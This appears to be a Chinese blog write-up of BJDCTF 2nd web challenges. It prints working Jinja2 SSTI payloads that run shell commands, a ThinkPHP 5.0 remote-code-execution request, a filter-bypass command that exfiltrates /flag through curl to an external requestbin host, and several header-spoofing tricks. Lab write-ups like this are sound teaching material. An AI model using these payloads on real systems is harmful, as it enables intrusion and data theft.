BJDCTF 2nd wp

2020-03-25 19:03:00
ctf - wp - BJDCTF

fake google

谷歌搜索框搜索后源码提示ssti,试了下{{ 6*6 }}发现输出36,exp:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='_IterationGuard' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls ../../../../../').read()") }}
{% endif %}
{% endfor %}

输出根目录有个flag,直接读:

官方wp为:

{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read()[1:] }}

看wp过滤输出,需要要切片才能读,但实际做题发现不用。

old-hack

首页即提示Thinkphp5,随便传个参数发现报错了,拉到最下面发现是tp5.0版本,直接网上搜一个rce打过去就好了,exp:

_method=__construct&filter[]=system&method=get&get[]=ls

回退发现根目录有个flag,直接:

_method=__construct&filter[]=system&method=get&get[]=cat /flag

duangShell

提示swp泄露,直接.index.php.swp获得源码,vim -r index.php.swp取得如下:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>give me a girl</title>
</head>
<body>
    <center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}

因为buu平台靶机无法访问外网,但可以用buu提供的内网进行访问,然后利用exec把flag作为post的数据post给我们的内网机器:

girl_friend=curl -X POST -d `c""at /flag` http://http.requestbin.buuoj.cn/1bvpl4g1

发现flag不是这个,尝试用find查找flag:

girl_friend=curl -X POST -d `find / -iname flag` http://http.requestbin.buuoj.cn/1bvpl4g1

如下目录存在flag:

/etc/demo/P3rh4ps/love/you/flag

直接cat flag

Schrödinger

查看源码发现有个test.php,进入后发现是个登录框,然后回看首页提示只要我们给网站地址它就会帮我们爆破出密码,那么可能就是利用它来爆破出test.php的密码,那么输入:

http://localhost/test.php

发现进度很慢,check之后抓个包看看,发现cookie有串码有两个%3D,也就是==,有可能是base64,解出来发现是时间戳,改了之后没什么反应,后面看wp才知道直接置空就可以获得提示。

Burst successed! The passwd is av11664517@1583985203

wp说av这个就是b站的视频号。。。然后根据后面时间戳翻到评论时间找flag。。。

BJD{Quantum_Mechanics_really_Ez}

假猪套天下第一

登录抓个包发现了L0g1n.php,进去后提示:

Sorry, this site will be available after totally 99 years!

即99年后才能访问,刷新抓包发现时间戳,改下时间戳,又提示这个:

Sorry, this site is only optimized for those who comes from localhost

改xff发现失败了,搜了下还有个X-Real-IP和Client-IP,改两个都可以,然后就是

Sorry, this site is only optimized for those who come from gem-love.com

加个Referer: gem-love.com

Sorry, this site is only optimized for browsers that run on Commodo 64

搜了下发现是一款浏览器,改为它的ua头Commodore 64

Sorry, this site is only optimized for those whose email is root@gem-love.com

from请求头表示请求发送者的邮箱,from: root@gem-love.com

Sorry, this site is only optimized for those who use the http proxy of y1ng.vip
if you dont have the proxy, pls contact us to buy, ¥100/Month

via放代理服务器地址via: y1ng.vip

flag到手



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号